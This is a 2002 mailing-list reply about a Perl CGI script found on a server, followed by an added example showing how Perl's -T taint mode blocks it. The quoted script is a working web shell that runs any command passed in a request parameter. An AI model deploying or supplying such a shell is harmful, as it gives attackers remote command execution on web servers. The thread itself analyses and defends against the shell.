Chris Reinhardt wrote:
> On Thu, 21 Mar 2002, John Michael wrote:
> 
> 
>>#!/usr/bin/perl
>>use CGI qw(:standard);
>>print header;
>>my $k=param("g");
>>my $a=param("s");
>>if ($a || $k) {
>>    $l=`$k 2>&1`;
>>    print start_form,textarea("g",$k,1,50);
>>    print submit("sc");
>>    print end_form;
>>    print pre($l);
>>}
>>print $ENV{"SERVER_NAME"};
>>
> 
> It executes arbitrary commands as <whatever your httpds run as>.

Don't delete it, but add the -T flag:

#!/usr/bin/perl -T

In addition to the hacker not being able to run anything and probably 
not understanding why, you will be able to check the logs to see what IP 
the script was called from and hopefully trace down the bugger.


_____________________________________________________________________
Stas Bekman             JAm_pH      --   Just Another mod_perl Hacker
http://stason.org/      mod_perl Guide   http://perl.apache.org/guide
mailto:[EMAIL PROTECTED]  http://ticketmaster.com http://apacheweek.com
http://singlesheaven.com http://perl.apache.org http://perlmonth.com/
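
What the suggested -T switch changes for the backtick line in the quoted script, as an added example that is not part of the original thread. The tainted string is a constructed stand-in for param("g"), and try_backticks is a hypothetical helper.

```perl
#!/usr/bin/perl -T
use strict;
use warnings;
use Scalar::Util qw(tainted);

# Constructed stand-in for param("g"). Under -T the interpreter path $^X is
# tainted, and any string built from tainted data is tainted as well.
my $from_request = "echo hello" . substr($^X, 0, 0);
my $from_script  = "echo hello";    # literal in the source, not tainted

# Taint mode also checks the environment a child process would inherit,
# so use a fixed PATH and drop the variables perlsec names as unsafe.
$ENV{PATH} = '/bin:/usr/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Hypothetical helper: run a command the way the quoted script does and
# report whether Perl let it through.
sub try_backticks {
    my ($cmd) = @_;
    my $out = eval { `$cmd 2>&1` };
    return defined $out ? "ran:     $out" : "blocked: $@";
}

for my $case ([request => $from_request], [script => $from_script]) {
    my ($label, $cmd) = @$case;
    printf "%-8s tainted=%s\n", $label, tainted($cmd) ? "yes" : "no";
    print "  ", try_backticks($cmd);
}
```

Start it as `perl -T file.pl`: Perl refuses a -T that appears only on the #! line when the script is launched as `perl file.pl`. The request-derived command is rejected with an "Insecure dependency" error, while the literal one runs.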
